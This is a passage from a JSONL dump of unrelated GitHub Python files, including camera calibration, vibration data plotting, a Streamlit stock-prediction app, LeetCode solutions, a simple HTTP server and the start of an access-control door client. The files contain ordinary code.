subset: List[str] = [\"barfoo\"]\n\n result = list_is_subset(subset, superset)\n\n self.assertFalse(result)\n\n def test_list_is_subset_lists_true(self):\n superset: List[List[str]] = [[\"foo\"], [\"bar\"], [\"foobar\", \"barfoo\"]]\n\n subset: List[List[str]] = [[\"foobar\"]]\n\n result = list_is_subset(subset, superset)\n\n self.assertTrue(result)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"cgbits/pybits","sub_path":"tests/subset_test.py","file_name":"subset_test.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72072892714","text":"import numpy as np\nimport cv2\nimport glob\nimport yaml\n\n# termination criteria\ncriteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n\n# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\nobjp = np.zeros((9*6,3), np.float32)\nobjp[:,:2] = np.mgrid[0:9,0:6].T.reshape(-1,2)\n\n\n# Arrays to store object points and image points from all the images.\nobjpoints = [] # 3d point in real world space\nimgpoints = [] # 2d points in image plane.\n\nimages = glob.glob('./*.png')\n\n\nfor fname in images:\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n # Find the chess board corners\n ret, corners = cv2.findChessboardCorners(gray, (9,6),None)\n\n # If found, add object points, image points (after refining them)\n if ret == True:\n objpoints.append(objp)\n\t\n corners2 = cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)\n imgpoints.append(corners2)\n\n # Draw and display the corners\n img = cv2.drawChessboardCorners(img, (9,6), corners2,ret)\n\nret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n \n\t\nprint(mtx) #camera matrix\nprint(dist) # distortion coefficient\n#cv2.imshow('img',img)\n\n\n#UNDISTORTION\n\ndata = {'camera_matrix': np.asarray(mtx,np.float32),\n 'dist_coeff': np.asarray(dist,np.float32)}\n\nwith open(\"calibration_matrix.yaml\", \"w\") as f:\n yaml.dump(data, f)\n\n\nwith open(\"calibration_matrix.yaml\", \"r\") as f:\n data = yaml.load(f)\n\nmtx = data['camera_matrix']\ndist = data['dist_coeff']\n\nNimg = cv2.imread('opencv_frame_30.png')\nh, w = Nimg.shape[:2]\nnewcameramtx, roi=cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),1,(w,h))\n# undistort\ndst = cv2.undistort(Nimg, mtx, dist, None, newcameramtx)\n# crop the image\n\ncv2.imwrite('calibresult.png',dst)\t\n#print(newcameramtx)\ncv2.imshow(\"undistorted\",dst)\n\ncv2.waitKey(0)\n \ncv2.destroyAllWindows()\n\n\n\n","repo_name":"AurornisTeam/Calibration","sub_path":"calibration/camera_calibration.py","file_name":"camera_calibration.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29907152904","text":"import pandas as pd\r\nimport openpyxl\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport numpy as np\r\n\r\n# 获取文件路径\r\nfile_path = 'root\\\\result\\\\targetline\\\\targetline_V2.xlsx'\r\n# 打开工作簿\r\nwb = openpyxl.load_workbook(file_path)\r\n# 遍历所有工作表\r\nfor sheet in wb.sheetnames:\r\n if sheet == \"Sheet\": # 如果该工作表名称为\"sheet\"\r\n wb.remove(wb['Sheet'])\r\n\r\n# 关闭工作簿\r\nwb.save('root\\\\result\\\\targetline\\\\targetline_V2.xlsx')\r\nwb.close()\r\n\r\n# 读取Excel文件\r\ndf = pd.read_excel('root\\\\result\\\\targetline\\\\targetline_V2.xlsx', sheet_name=None)\r\n\r\n# 定义要过滤的字符串\r\nstrings_to_filter = ['topX', 'topY', 
'topZ']\r\n\r\n# 定义要合并的工作表类别\r\ncategories = ['9.62 order run up', '9.62 order run down', '26 order run down', '26 order run up']\r\n\r\n# 循环遍历每个工作表类别\r\nfor category in categories:\r\n # 循环遍历每个要过滤的字符串\r\n for string in strings_to_filter:\r\n # 过滤包含特定字符串的工作表\r\n filtered_sheets = [sheet for sheet in df.keys() if string in sheet and category in sheet]\r\n # 如果有匹配的工作表,则将它们合并为一个工作表\r\n if filtered_sheets:\r\n combined_sheet = pd.concat([df[sheet] for sheet in filtered_sheets])\r\n \r\n # 将合并后的工作表添加到DataFrame中\r\n df[f'{category} {string}'] = combined_sheet\r\n # 在新添加的列中填充原始工作表的名称\r\n df[f'{category} {string}']['Sheet Name'] = [sheet for sheet in filtered_sheets for i in range(len(df[sheet]))]\r\n # 将Sheet Name列重命名为Torque列\r\n df[f'{category} {string}'] = df[f'{category} {string}'].rename(columns={'Sheet Name': 'Torque'})\r\n # 替换特定字符串\r\n df[f'{category} {string}']['Torque'] = df[f'{category} {string}']['Torque'].replace(['9.62 order run up', '9.62 order run down', '26 order run down', '26 order run up', 'topX', 'topY', 'topZ','_','fra','f','me'], '', regex=True)\r\n \r\n # 删除原始工作表\r\n for sheet in filtered_sheets:\r\n del df[sheet]\r\n\r\n\r\n\r\n# 将结果写入新的Excel文件\r\nwith pd.ExcelWriter('root\\\\result\\\\targetline\\\\target group.xlsx') as writer:\r\n for sheet_name, sheet_df in df.items():\r\n sheet_df.to_excel(writer, sheet_name=sheet_name, index=False) \r\n\r\n\r\n\r\n\r\n# 读取Excel文件\r\ndfgroup = pd.read_excel('root\\\\result\\\\targetline\\\\target group.xlsx', sheet_name=None)\r\n\r\n\r\n# 遍历每个sheet\r\nfor sheet in dfgroup :\r\n\r\n # 提取数据,并计算新列\r\n data = dfgroup [sheet].set_index('input speed')\r\n\r\n # 创建包含所有唯一扭矩值的列表\r\n torques = sorted(data['Torque'].unique())\r\n\r\n # 创建一个空的DataFrame来存储每组扭矩值之间的相关系数\r\n correlations_df = pd.DataFrame(index=torques, columns=torques)\r\n\r\n # 针对每一组扭矩值,计算Target+5列与其它变量之间的相关系数,并更新correlations_df\r\n for i, torque1 in enumerate(torques):\r\n subset1 = data[data['Torque'] == torque1] \r\n \r\n for j, torque2 in enumerate(torques):\r\n subset2 = data[data['Torque'] == torque2] \r\n \r\n # 计算 subset1 和 subset2 中较短的长度\r\n min_length = min(len(subset1), len(subset2))\r\n end_speed = min(subset1.index[min_length-1], subset2.index[min_length-1])\r\n\r\n subset1_filtered = subset1[subset1.index < end_speed].reset_index(drop=True)\r\n subset2_filtered = subset2[subset2.index < end_speed].reset_index(drop=True)\r\n\r\n # 计算subset1和subset2之间Target+5列的相关性系数,并存储到correlations_df中\r\n corr_coef = subset1_filtered['target'].corr(subset2_filtered['target'], method='kendall')\r\n correlations_df.iat[i, j] = corr_coef\r\n correlations_df = correlations_df.astype(float)\r\n print(correlations_df)\r\n # 绘制矩阵图\r\n plt.figure(figsize=(24, 8))\r\n plt.subplot(1, 4, (2, 4))\r\n \r\n sns.lineplot(data=data, x='input speed', y='target+5', hue='Torque')\r\n plt.title(sheet)\r\n plt.legend(title=\"Legend\", loc=\"upper left\")\r\n plt.xlabel(\"Input Speed\")\r\n plt.ylabel(\"Housing Vibration dB[g]\")\r\n plt.xlim(0, 10000)\r\n plt.xticks(np.arange(0, 10001, 1000))\r\n plt.ylim(60, 166)\r\n plt.yticks(np.arange(60, 166, 10))\r\n plt.grid(color='#D3D3D3')\r\n plt.subplot(1, 4, 1)\r\n sns.heatmap(correlations_df, cmap='coolwarm', annot=True,\r\n xticklabels=torques, yticklabels=torques, vmin=0, vmax=1)\r\n plt.title('Correlation Matrix')\r\n \r\n\r\n # 保存图像\r\n plt.savefig(f\"root//result//visualization//07 dataoverview//dataoverview//05 torque correlation//{sheet}.png\")\r\n \r\n # 关闭图像,以便下一个循环可以绘制一个新的图形并使用相同的名称\r\n 
plt.close()\r\n\r\n","repo_name":"aierlanjiu/Vibration-Test-Data-Summary","sub_path":"src/torque_corr.py","file_name":"torque_corr.py","file_ext":"py","file_size_in_byte":4967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7295739212","text":"#! /usr/bin/env python\n# coding:utf8\n\nimport rospy\nfrom custom_msgs.msg import Student\n\nif __name__ == '__main__':\n\n nodeName = \"publisher_node\"\n rospy.init_node(nodeName)\n\n topicName = \"/zcb01/topic\"\n pub = rospy.Publisher(topicName, Student, queue_size=1000)\n\n rate = rospy.Rate(2)\n msg = Student()\n idx = 0\n while not rospy.is_shutdown():\n msg.name = \"tom%d\" % idx\n msg.age = idx\n pub.publish(msg)\n\n idx += 1\n rate.sleep()\n\n\n","repo_name":"zzzcb/robot","sub_path":"06ros/ws02/first_ws/src/use_custom_msg_pkg/scripts/publisher_cus_msg.py","file_name":"publisher_cus_msg.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"22154123588","text":"import csv\nimport random\nfrom pathlib import Path\nfrom datetime import datetime\nfrom itertools import cycle\n\nPATH_INPUT_FOLDER = Path(__file__).parent / Path('input') \nPATH_OUTPUT_FOLDER = Path(__file__).parent / Path('output') \nPATH_PEOPLE = PATH_INPUT_FOLDER / 'people.csv'\n\nVERBOSE = True\n\nELDER = 'Elder'\nJOURNEYMAN = 'Journeyman'\nAPPRENTICE = 'Apprentice'\n\n# Define a class to represent people\nclass Person:\n def __init__(self, name, category):\n self.name = name\n self.category = category\n\n def __str__(self):\n return f\"Name: {self.name}, Category: {self.category}\"\n\n# Function to create a template CSV file if it doesn't exist\ndef create_template_csv():\n with open(PATH_PEOPLE, mode='w', newline='') as file:\n writer = csv.writer(file, delimiter=';')\n writer.writerow(['Name', 'Category'])\n writer.writerow(['Person1', ELDER])\n writer.writerow(['Person2', ELDER])\n writer.writerow(['Person3', ELDER])\n writer.writerow(['Person4', JOURNEYMAN])\n writer.writerow(['Person5', JOURNEYMAN])\n writer.writerow(['Person6', JOURNEYMAN])\n writer.writerow(['Person7', JOURNEYMAN])\n writer.writerow(['Person8', APPRENTICE])\n writer.writerow(['Person9', APPRENTICE])\n writer.writerow(['Person10', APPRENTICE])\n writer.writerow(['Person11', APPRENTICE])\n\n# Function to read the CSV file and return a list of dictionaries\ndef read_people_csv():\n people_list = []\n with open(PATH_PEOPLE, mode='r') as file:\n reader = csv.DictReader(file, delimiter=';')\n for row in reader:\n person = Person(row['Name'], row['Category'])\n people_list.append(person)\n return people_list\n\ndef print_groups(groups:list[list[Person]]):\n for i, group in enumerate(groups):\n print(f\"Group {i+1}: {[f'{person.name, person.category}' for person in group]}\")\n print(\"\")\n\n# Function to sort people into groups based on the given conditions\ndef sort_people_into_groups(people_list: list[Person]) -> list[list[Person]]:\n groups: list[list[Person]] = []\n shuffled_people_list = people_list.copy() # Create a copy of the original list\n random.shuffle(shuffled_people_list) # Shuffle the people list to ensure random selection\n\n # Make groups using elders\n for person in shuffled_people_list:\n if person.category == ELDER:\n groups.append([person])\n people_list.remove(person) # Remove the person from the original list\n\n if VERBOSE: print_groups(groups)\n\n # Make groups using apprentice, journeymen. 
prioritize for one of each here.\n for group in groups:\n shuffled_people_list = people_list.copy()\n random.shuffle(shuffled_people_list) # Shuffle the people list to ensure random selection\n for person in shuffled_people_list:\n categories_in_group = [person.category for person in group]\n if person.category == APPRENTICE and APPRENTICE not in categories_in_group:\n group.append(person)\n people_list.remove(person) # Remove the person from the original list\n elif person.category == JOURNEYMAN and JOURNEYMAN not in categories_in_group:\n group.append(person)\n people_list.remove(person) # Remove the person from the original list\n\n if len(group) == 3:\n break\n\n if VERBOSE: print_groups(groups)\n\n if VERBOSE: print(f\"Remaining: {[f'{person.name, person.category}' for person in people_list]}\")\n\n return groups\n\n# Function to fill remaining slots in groups with available people\ndef fill_remaining_slots(groups: list[list[Person]], people_list: list[Person]) -> list[list[Person]]:\n group_cycle = cycle(groups)\n for person in people_list:\n current_group = next(group_cycle)\n current_group.append(person)\n return groups\n\n# Function to write the sorted groups into a file in CSV format\ndef write_groups_to_file(groups: list[list[Person]]):\n current_datetime = datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n file_name = PATH_OUTPUT_FOLDER / f\"sorted_groups_{current_datetime}.txt\"\n with open(file_name, 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['Name', 'Category'])\n writer.writerow([])\n for i, group in enumerate(groups, start=1):\n writer.writerow([f\"Group {i}:\", ''])\n for person in group:\n writer.writerow([person.name, person.category])\n writer.writerow([]) # Add an empty row for separation between groups\n\ndef main():\n # Check if the people.csv file exists, if not, create a template\n if not PATH_PEOPLE.exists():\n create_template_csv()\n\n # Read the CSV file\n people_list = read_people_csv()\n\n # Sort people into groups based on the given conditions\n groups = sort_people_into_groups(people_list)\n\n # Fill the remaining slots in groups with available people\n groups = fill_remaining_slots(groups, people_list)\n\n # Print the final groups\n print_groups(groups)\n\n # Write the sorted groups to a file, dated in YYYY-MM-DD format\n write_groups_to_file(groups)\n\nif __name__ == \"__main__\":\n main()","repo_name":"shanedertrain/three_grouper","sub_path":"three_grouper.py","file_name":"three_grouper.py","file_ext":"py","file_size_in_byte":5216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20118057302","text":"''' Variable scope'''\n'''\na = 10\nb = 20\ndef f1():\n global c\n global a\n print(\"Print a inside 1: \", a)\n a = 15\n c = 30\n print(\"Print a inside 2: \", a)\n print(\"Print b inside 1: \", b)\n\n\nprint(\"Print a outside 1: \", a)\nf1()\nprint(\"Print a outside 2: \", a)\nprint(\"Print c outside 1: \", c)\n\n'''\n'''Types of arguments'''\n'''\ndef add1(a, b, c)\n ans = a+b+c\n print(ans)\n return ans\nadd1(10, 20, 30)\n\ndef add1(a, b, c)\n ans = a+b+c\n print(ans)\n return ans\nadd1(10, b=20, c=30)\nadd1(10, c=30, b=40)\n\ndef add1(a, b, c= 100)\n ans = a+b+c\n print(ans)\n return ans\nadd1(10, b=20, c=30)\nadd1(10, b=20)\n\n\n\ndef add1(*args):\n print(args)\n mul = 1\n for arg in args:\n mul = mul * arg\n ans = sum(args)\n print(ans, mul)\n return ans\n\nadd1(10, 20, 30)\n\ndef add1(args):\n print(args)\n mul = 1\n for arg in args:\n mul = mul * arg\n ans = 
sum(args)\n print(ans, mul)\n return ans\n\nn = input(\"Enter how many numbers to add\")\ninp_data = list()\nfor i in range(int(n)):\n inp_data.append(int(input(f\"Enter number {i+1} : \")))\n \nadd1(inp_data)\n\ndef add1(a,b,c,d):\n ans = a+b+c+d\n return ans\n\ninp_data = (10,20,30,40)\nres = add1(*inp_data)\nprint(res * res)\n'''\ndef add1(*args, **kwargs):\n print(args)\n print(kwargs)\n for k, v in kwargs.items():\n print(f\"{k} is {v}\")\n mul = 1\n for arg in args:\n mul = mul * arg\n ans = sum(args)\n print(ans, mul)\n return ans\n\nadd1(10, 20, 30, name='abcd', age=25, phone_no=2524214)\n\n\n\n\n\n\n\n\n\n \n","repo_name":"salvieknath18/python_work","sub_path":"teaching_work/function_lecture1.py","file_name":"function_lecture1.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"1432556122","text":"from ..Entities.Transaction import Transaction as Transaction\nfrom typing import List\nclass Block:\n def __init__ (self, timestamp: float, previous_block_hash: str, init_value:float, init_destination:str, tx_dataset:List[Transaction], block_nonce:int, block_hash:str):\n self.timestamp = timestamp\n self.previous_block_hash = previous_block_hash\n self.init_value = init_value\n self.init_destination = init_destination\n self.tx_dataset = tx_dataset\n self.block_nonce = block_nonce\n self.block_hash = block_hash\n","repo_name":"reislucas94/tcc2-centralized-cryptocurrency","sub_path":"Central/Entities/Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9943266885","text":"import streamlit\nimport yfinance\nimport plotly\nimport streamlit as st\nfrom datetime import date\nimport yfinance as yf\nfrom plotly import graph_objs as go\nimport SP500_data_downloader as SP\nfrom SP500_data_downloader import *\nimport Macrotrends_downloader as MT\nfrom Macrotrends_downloader import *\nfrom IPython.display import clear_output\nfrom pandas_datareader import DataReader\nfrom streamlit.errors import StreamlitAPIException\nimport predictions_STA_EMA as STA_EMA\nfrom predictions_STA_EMA import *\n\n\nst.markdown(\"
STOCK PREDICTION
\", unsafe_allow_html=True)\n\nst.markdown(\"\"\"\nDear user,\ndata are uploading and it may take a while... This process may take approximately 15 minutes. Thanks to data upload at the beginning, you can further change your analysis without any additional waiting.\n\"\"\")\n\nst.markdown(\"
Selection of data for analysis
\", unsafe_allow_html=True)\n\ntickers=SP500()\n\n#LOADING ONLY 9 TICKERS\n#@st.cache #LOADING ONLY 9 TICKERS\n#def load_data():\n# data = get_data_try()\n# return data\n\n\n\n#LOADING ALL TICKERS\n@st.cache #LOADING ALL TICKERS\ndef load_data():\n data = get_data_yahoo()\n return data\n\ndata=load_data()\n\n\nBEGINNING = \"2015-01-01\"\nTODAY = date.today().strftime(\"%Y-%m-%d\")\n\nst.write(\"Firstly, select a maximum of 4 shares.\")\n\ntry:\n selected_tickers = st.multiselect('Companies', tickers) #selecting tickers for analysis\n#Dataframes\n data_volume=pd.DataFrame(data.Volume[selected_tickers],columns=selected_tickers)\n data_volume.index = pd.to_datetime(data_volume.index)\n\n data_close=pd.DataFrame(data.Close[selected_tickers],columns=selected_tickers)\n data_close.index = pd.to_datetime(data_close.index)\n\n data_open=pd.DataFrame(data.Open[selected_tickers],columns=selected_tickers)\n data_open.index = pd.to_datetime(data_open.index)\nexcept KeyError:\n st.error('We are so sorry, you selected ticker, for which data are invalid. Please, select other ticker.')\n \n\n\n\nst.markdown(\"
Please press the button to check whether the analysis will work correctly with the selected data.
\", unsafe_allow_html=True)\n\nif st.button('Click for check'):\n if len(selected_tickers) > 4:\n st.warning('You can select maximum 4 tickers for analysis. Please, reselect your tickers otherwise, the analysis may not be correct and some error may occur.')\n elif len(selected_tickers) <1:\n st.error('You must select at least 1 ticker.')\n else:\n st.write('With selected data, the analysis will work properly :-)')\n st.write(\"Your selected tickers are:\")\n st.write(', '.join(selected_tickers))\n\nst.markdown(\"
If you obtain a positive message that the analysis will work properly, you can proceed with the analysis.
\", unsafe_allow_html=True)\n\nst.subheader('Financial data from Yahoo Finance')\n\nif st.button('Click for data and graphs'):\n #Data and graph for close prise\n col_close, col_close_t = st.columns([3, 2])\n\n col_close.subheader(\"Close price of the stocks\")\n col_close.line_chart(data_close)\n with st.expander(\"See explanation\"):\n st.write(\"\"\"\n The chart and the table above show the data for close price for selected stocks. Closing price denotes the price at the end of the trading day at which security was transacted. As it is not influenced by stock splits or cash/stock dividens, it is a feature investors look at the most often.\n \"\"\")\n\n col_close_t.subheader(\"Close price for selected stocks\")\n col_close_t.write(data_close)\n \n #Data and graph for open price\n col_close, col_close_t = st.columns([3, 2])\n\n col_close.subheader(\"Open price of the stocks\")\n col_close.line_chart(data_close)\n with st.expander(\"See explanation\"):\n st.write(\"\"\"\n The chart and the table above show the data for open price for selected stocks. Opening price refers to the price at which each stock is traded immediately after the stock exchange opens to trading. However, it is not the same as the closing price from previous trading day.\n \"\"\")\n\n col_close_t.subheader(\"Open price for selected stocks\")\n col_close_t.write(data_close)\n \n #Data and graph for volume\n col_close, col_close_t = st.columns([3, 2])\n\n col_close.subheader(\"Volume of the stocks\")\n col_close.line_chart(data_close)\n with st.expander(\"See explanation\"):\n st.write(\"\"\"\n The chart and the table above show the data of volume for selected stocks. In general, trading volume measures how much certain financial asset is traded during specific period. In case of stocks, it means number of shares traded. 
Trading volumes are associated with market strength and thus, investors consider observing volume patterns very useful.\n \"\"\")\n\n col_close_t.subheader(\"Volume for selected stocks\")\n col_close_t.write(data_close)\n\ndef macro_df():\n ratios=pd.DataFrame()\n for ticker in selected_tickers:\n rat=get_data_macro(ticker)\n rat=rat.set_index('field_name').T\n ratios2=pd.DataFrame(rat)\n ratios2.insert(0,'TICKER','')\n ratios2[\"TICKER\"] = ticker\n ratios=ratios.append(ratios2)\n #ratios.rename(columns={'field_name':'Ratio'}, inplace=True)\n return(ratios) \n \n#Ratios for selected tickers\nMT_data=macro_df()\nMT_data=pd.DataFrame(MT_data)\nMT_data_show = MT_data.astype(str)\nlist_of_ratios_with_T=MT_data_show.columns.to_list()\nlist_of_ratios=list_of_ratios_with_T[1:]\n#list_of_ratios=MT_data_show[\"Ratio\"].values.tolist()\n\nst.subheader('Ratios from Macrotrends')\ntry:\n what_ratio = st.radio(\n \"For what tickers do you want to see ratio?\",\n ('For all selected tickers', 'For one from selected tickers', 'For one from all tickers from S&P 500'))\n if what_ratio == 'For all selected tickers':\n st.write('Here you can see ratios for all selected tickers')\n st.write(MT_data_show)\n with st.expander(\"See definitions of ratios\"):\n with open('Ratios_def.txt') as f:\n for line in f:\n st.write(line)\n elif what_ratio=='For one from selected tickers':\n st.write('Please, select one ticker from previously selected tickers.')\n option = st.selectbox(\n 'Select to show ratios only for',\n (selected_tickers))\n st.write('You selected:', option)\n rat1=MT_data_show[MT_data_show[\"TICKER\"] ==option]\n rat2=rat1.astype(str)\n st.write(rat2)\n ratio_selected2=st.selectbox(\n 'What ratio are you interested to display?',\n (list_of_ratios))\n with st.expander(\"See definitions of ratios\"):\n with open('Ratios_def.txt') as f:\n for line in f:\n st.write(line)\n st.subheader(f'Data for ratio: {ratio_selected2}')\n df_rat_sel2=rat2[ratio_selected2]\n col_rat2, col_rat2_t = st.columns([4, 2])\n col_rat2.subheader(\"Graph\")\n col_rat2.line_chart(df_rat_sel2)\n col_rat2_t.subheader(\"Table\")\n col_rat2_t.write(df_rat_sel2)\n else:\n st.write('Please, select one ticker from S&P Tickers.')\n option2 = st.selectbox(\n 'Select to show ratios only for',\n (tickers))\n st.write('You selected:', option2)\n rat3=get_data_macro(option2)\n rat3=rat3.set_index('field_name').T\n rat4=pd.DataFrame(rat3)\n rat4=rat4.astype(str)\n st.dataframe(rat4)\n ratio_selected3=st.selectbox(\n 'What ratio are you interested to display?',\n (list_of_ratios))\n with st.expander(\"See definitions of ratios\"):\n with open('Ratios_def.txt') as f:\n for line in f:\n st.write(line)\n st.subheader(f'Data for ratio: {ratio_selected3}')\n df_rat_sel3=rat4[ratio_selected3]\n col_rat3, col_rat3_t = st.columns([4, 2])\n col_rat3.subheader(\"Graph\")\n col_rat3.line_chart(df_rat_sel3)\n col_rat3_t.subheader(\"Table\")\n col_rat3_t.write(df_rat_sel3)\nexcept StreamlitAPIException:\n st.error('We are so sorry, you selected ticker, for which data are invalid. Please, select other ticker.')\n \nst.subheader('Stock price and volume predictions')\n\nif st.button('Click for short term predictions'):\n bb=pd.DataFrame(data)\n #st.write(\",\".join((selected_tickers)))\n st.write(\"In the tables below, you are given short-term (one trading day ahead) predictions on Open price, Close price and Volume of selected ticker(s).\") \n st.write(\"The first table contains predictions obtained via Standard Averaging (STA). 
The key idea of this method is to use historical values within specific time window (in this prediction we use 100 days), average them and use the obtained value as prediction for the following day.\")\n st.write(pred_sta_app(selected_tickers, bb))\n st.write(\" \")\n st.write(\" \")\n st.write(\"The second table presents predictions coming from exponential averaging following Exponential Moving Average (EMA) methodology.\")\n st.write(pred_ema_app(selected_tickers,bb))\n st.write(\" \")\n st.write(\" \")\n #st.write(data_volume)\n #st.write(\" \")\n #st.write(\" \")\n #st.write(pd.DataFrame(data.Volume[selected_tickers][\"GE\"],columns=selected_tickers))\n #st.write(\" \")\n #st.write(\" \")\n #st.write(pd.DataFrame(data.Close))\n #st.write(data)\n\nst.subheader('Downloading data')\n\nst.markdown(\"
If you would like to create your own analysis, you can download the data for the S&P 500 market index from Yahoo Finance below.
\", unsafe_allow_html=True)\n\n@st.cache\ndef convert_df(df):\n return df.to_csv().encode('utf-8')\n\ndata_csv = convert_df(data)\n\nst.download_button(\n label=\"Download financial data\",\n data=data_csv,\n file_name='data.csv',\n mime='text/csv',\n )\n","repo_name":"AnnaBezu/Project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32119260961","text":"from typing import List\n\n\nclass Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n cur_idx = 0\n for num in nums:\n if num == 0:\n continue\n nums[cur_idx] = num\n cur_idx += 1\n while cur_idx < len(nums):\n nums[cur_idx] = 0\n cur_idx += 1\n # return nums\n\n\nif __name__ == '__main__':\n solution = Solution()\n nums = [0, 1, 0, 3, 12]\n print(solution.moveZeroes(nums))\n","repo_name":"ace7chan/leetcode-daily","sub_path":"code/202011/20201119_283_moveZeroes.py","file_name":"20201119_283_moveZeroes.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30857919954","text":"from logging import INFO, getLogger, StreamHandler, Formatter, FileHandler, DEBUG\nimport os\n\n\ndef setup_logger(file_name, modname=__name__):\n dir = os.path.dirname(file_name)\n if not os.path.isdir(dir):\n os.makedirs(dir)\n\n logger = getLogger(modname)\n logger.setLevel(DEBUG)\n\n sh = StreamHandler()\n sh.setLevel(DEBUG)\n formatter = Formatter(\n '%(levelname)s:%(filename)s:%(lineno)d:%(message)s')\n sh.setFormatter(formatter)\n logger.addHandler(sh)\n\n fh = FileHandler(file_name)\n fh.setLevel(INFO)\n fh_formatter = Formatter(\n '%(asctime)s:%(levelname)s:%(filename)s:%(lineno)d:%(message)s')\n fh.setFormatter(fh_formatter)\n logger.addHandler(fh)\n return logger\n\n\nif __name__ == '__main__':\n filepath = 'log/test/mkdir_test.log'\n logger = setup_logger(filepath)\n logger.debug('Log test')\n listed_markets = [{'name': 'BTC-PERP', 'ask': 100}]\n logger.info(listed_markets)\n","repo_name":"massun-onibakuchi/py-trader-v2","sub_path":"src/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23953749817","text":"from math import log\n\n\ndef primes(n):\n p = [1] * n\n p[0] = p[1] = 0\n\n i = 2\n while i < n:\n if p[i]:\n yield i\n for j in range(2 * i, n, i):\n p[j] = 0\n i += 1\n\n\nm = 2 * 10 ** 6\nprint(sum(primes(m)))\n","repo_name":"scottwillmoore/project-euler-solutions","sub_path":"p010.py","file_name":"p010.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12941008272","text":"from http.server import *\n\n\nclass myHandler(SimpleHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(bytes(\"hello, nikolay\", \"utf8\"))\n\n\n# configure server\nport = 8080\nserver_address = (\"127.0.0.1\", port)\nhttpd = HTTPServer(server_address, myHandler)\n\n# run 
server\nhttpd.serve_forever()\n","repo_name":"narlah/Pythonicas","sub_path":"MainTestingAreaPy/httpServer.py","file_name":"httpServer.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25672891156","text":"class Solution:\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n :type nums1: List[int]\n :type m: int\n :type nums2: List[int]\n :type n: int\n :rtype: void Do not return anything, modify nums1 in-place instead.\n \"\"\"\n last1 = m - 1\n last2 = n - 1\n last = m + n - 1\n while last2 >= 0:\n if last1 == -1:\n nums1[last] = nums2[last2]\n last2 -= 1\n else:\n if nums1[last1] >= nums2[last2]:\n nums1[last] = nums1[last1]\n last1 -= 1\n else:\n nums1[last] = nums2[last2]\n last2 -= 1\n last -= 1\n\n\n","repo_name":"turing4ever/codesnippets","sub_path":"leetcode/88.merge-sorted-array.python3.py","file_name":"88.merge-sorted-array.python3.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70377844392","text":"import win32com.client\nimport logging\nfrom models.control_point import ControlPoint\nfrom models.user import User\nfrom models.vector import Vector\nfrom services.service_interfaces import IAccessControlSystem\nfrom typing import Dict, Tuple, List\nfrom os import listdir\nfrom os.path import isfile, join\nimport datetime\nimport time\n\n\nclass AccessControlSystem(IAccessControlSystem):\n\n def __init__(self):\n FlexServ = win32com.client.Dispatch(\"FlexServer.FlexServerGlobal\")\n token = FlexServ.AuthenticateUser(\"admin\", \"admin\", False)\n self._FlexACS = FlexServ.GetObject(token, \"FlexACSModule.FlexACS\")\n self._FlexACS.ConnectAll(None, 0)\n self._FlexDB = FlexServ.GetObject(token, \"FlexDB.FlexDBModule\")\n self._path = \"D:\\\\Октаграм\\\\client_temp\\\\\"\n self._last_time_accessed = datetime.datetime.now() - datetime.timedelta(seconds=6)\n self._last_user_accessed = User('','', Vector(''))\n logger = logging.getLogger(__name__)\n logger.debug(\"FlexACS: {}\".format(str(self._FlexACS)))\n logger.debug(\"FlexDB: {}\".format(str(self._FlexDB)))\n\n def open_door(self, door: ControlPoint, user: User):\n try:\n self._FlexACS.FlexCommand(\n None, \"S-1-0581B9AD-5CDC-4d86-A328-0D94A615A418\", 10133)\n logger = logging.getLogger(__name__)\n logger.debug(self._last_time_accessed)\n logger.debug(datetime.datetime.now())\n logger.debug(datetime.datetime.now() - self._last_time_accessed)\n logger.debug((datetime.datetime.now() - self._last_time_accessed) > 